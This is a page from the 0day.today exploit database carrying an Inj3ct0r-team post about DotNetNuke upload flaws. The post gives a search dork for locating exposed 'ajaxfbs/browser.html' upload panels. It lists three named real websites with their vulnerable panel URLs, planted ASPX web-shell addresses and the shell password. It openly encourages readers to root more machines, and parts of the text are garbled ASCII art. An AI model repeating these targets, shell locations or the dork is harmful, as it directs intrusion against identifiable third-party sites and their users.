0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
DotNetNuke Multiple 0day Vulnerabilities
========================================== DotNetNuke Multiple 0day Vulnerabilities ========================================== The largest Exploit Database in the world ! # Greetz to Inj3ct0r Cr3w 1337day.com # Greetz to R0073r "Sid3^effects - Were ya @ Bro" indoushka XroGuE gunslinger_ KedAns-Dz L0rd CrusAd3r "The Exploited - I miss you buddy!" # #1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 #0 _ __ __ __ 1 #1 /' \ __ /'__`\ /\ \__ /'__`\ 0 #0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 #1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 #0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 #1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 #0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 #1 \ \____/ >> Exploit database separated by exploit 0 #0 \/___/ type (local, remote, DoS, etc.) 1 #1 1 #0 [+] Site : Inj3ct0r.com 0 #1 [+] Support e-mail : submit[at]inj3ct0r.com 1 #0 0 #1 #################################### 1 #0 I'm SeeMe member from Inj3ct0r Team 1 #1 #################################### 0 #0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 DotNetNuke 5.x other versions may be effected as well, [+] Application: DotNetNuke [+] Affected Version: version prior to 5.x [+] Vendor’s URL: http://www.dotnetnuke.com/ [+] Bug Type: Privilege escalation, Unauthorized access, Remote [+] Risk Level: High [+] No-exploit is required to make it easier than what it is.. [+] DotNetNuke Remote File Upload Vulnerability [+] Add/User Account Security Failer Vulnerability [+] Unauthorized Full access to the Server! :) [+] Unauthorized Full access to the Files and Database! [+] It Could Be Failure to revalidate file and folder permissions correctly for uploads. [-*-] Quick Note: [-] Vulnerability Details: DO NOT be a zone h lamer! just try to be more effective speard your shit And hunte more idiots and root their machines! then hit them in the middle of no where by Saying "Ph33r" Access the upload panel Just dork:"inurl:ajaxfbs/browser.html" Demo: [1] http://www.iebsoftware.com/tramways/DesktopModules/FeedbackDesigner/ajaxfbs/browser.html Aspx Shell with New user Privilege http://www.iebsoftware.com/aspx.aspx Password: admin [2] http://churchofthegoodshepherdwantage.org/DesktopModules/FlashSlide/ajaxfbs/browser.html Aspx Shell with New user Privilege http://churchofthegoodshepherdwantage.org/aspx.aspx Password: admin [3] http://members2.allegranetwork.com/DeskTopModules/Complete%20Feedback%20Designer/ajaxfbs/browser.html Aspx Shell with New user Privilege http://members2.allegranetwork.com/aspx.aspx Password: admin [*_*] The thanx belongs to the masters! Islamic Ghosts Team :) # 0day.today [2024-12-25] #